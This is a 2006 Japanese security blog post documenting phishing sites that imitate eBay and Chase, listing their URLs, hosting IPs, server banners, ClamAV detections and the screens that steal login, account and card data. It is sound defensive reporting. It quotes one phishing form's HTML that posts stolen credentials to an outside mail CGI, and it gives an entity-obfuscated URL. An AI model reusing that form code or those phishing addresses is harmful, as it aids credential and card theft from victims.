Mobile it! 広告及びスポンサー募集中: 詳しくは banner AT rep2.rbl.jp にお問い合わせください
Prev 2006.4 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
Today: Yesterday: Total:

April 08, 2006

● ebay.comの偽サイト ttp://mujweb.cz/www/ssignin-ebay-com/ws/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.htm?r=5367
ClamAVでHTML.Phishing.Auction-102と検知されています。

mujweb.czのアドレスは212.47.13.223でチェコ、逆引きはatlas223.a2.atlas.czです。

詐欺ページのフォームは以下のようになっていてよそにあるできの悪いCGIを使ってメールで_1_MailServer@mail.deres-navn.dk に送られるようになっています。

<FORM action=http://muiecuspume.100free.com/memo/mailform.exe method=post ><INPUT type=hidden value=mail.deres-navn.dk name=_1_MailServer>

ttp://mujweb.cz/ のトップページはまったく無関係のページになっているのでこのサーバーがクラックされたものと思われます。

wwwサーバーの応答からはOSなどは不明ですがSMTPの応答によるとfreeweb.a2.atlas Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830となるのでWindowと思われます。

ebay.comに通報しました。

ebay

IDとパスワード詐取画面です。このあと他人のプロフィール表示ページに飛ばされます。

● chase.comの偽サイト ttp://www.dotmp3.biz/online.chase.com/online/login//
login// は犯人のミスでしょう。

ClamAVでHTML.Phishing.Bank-391と検知されています。

アドレスは62.149.130.135でイタリーです。逆引きはwebs125.aruba.it。

サーバーの応答はMicrosoft-IIS/6.0です。

chase

でたらめのIDでログインできます。

chase

口座情報詐取画面。ボタンを押すと下になります。

chase

カード情報詐取画面です。

● chase.comの偽サイト ttp://www.chase-reward-signup.com/chase/index.htm
ClamAVでHTML.Phishing.Bank-362と検知されています。

アドレスは61.177.147.97で中国です。逆引きは無し。

サーバーの応答はApache/2.0.52 (Red Hat)です。

chase

アンケートに答えると20ドル振り込みますと誘います。(上部)

chase

口座番号を入れる画面。(下部)

● chase.comの偽サイト ttp://ip24-251-254-251.ph.ph.cox.net:84/chaseonline.chase.com/colportal/update_card.html
ClamAVでHTML.Phishing.Bank-159と検知されています。

すでにサーバーは停止しています。アドレスは24.251.254.251でアメリカです。

● chase.comの偽サイト ttp://rds.yahoo.com/_ylt=3DA0LaSV66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG=148vsd1jp/EXP=1138544186/**http%3a//www.allround-service.hu/~coolgsm/.jpmorgan/index.php?WduaW5fcGFnZUx=aW5kZXgucGhwP3Byb3NwZWN0X25mcGI9dHJ1ZXBvcnRsZXRfc2lnbmluXzFfYWN0aW9uT3ZlcnJpZGVGY2hhc2VvbmxpbmVGc2lnbmluRnZlcmlm
ClamAVでHTML.Phishing.Bank-387と検知されています。

トップページはForbiddenとなるのですがttp://www.allround-service.hu/~coolgsm/に別コンテンツがあるのでクラックされているようです。

サーバーの応答はApache/1.3.33 (Unix) PHP/4.4.0です。

chase

でたらめなメールアドレスを入れるとログインできます。

chase

カード番号詐取画面です。

● chase.comの偽サイト ttp://66.162.158.230:81/colappmgr/
ClamAVでHTML.Phishing.Bank-386と検知されています。

デコードされる前のURLは以下の表記です。
ttp://&#54;&#54;&#46;&#49;&#54;&#50;&#46;&#49;&#53;&#56;&#46;&#50;&#51;&#48;&#58;&#56;&#49;&#47;&#99;&#111;&#108;&#97;&#112;&#112;&#109;&#103;&#114;&#47;

すでにサーバーは停止しています。アドレス66.162.158.230はアメリカです。逆引きは66-162-158-230.gen.nti.us。
— posted by staff @ 08:39AM | TrackBack(0)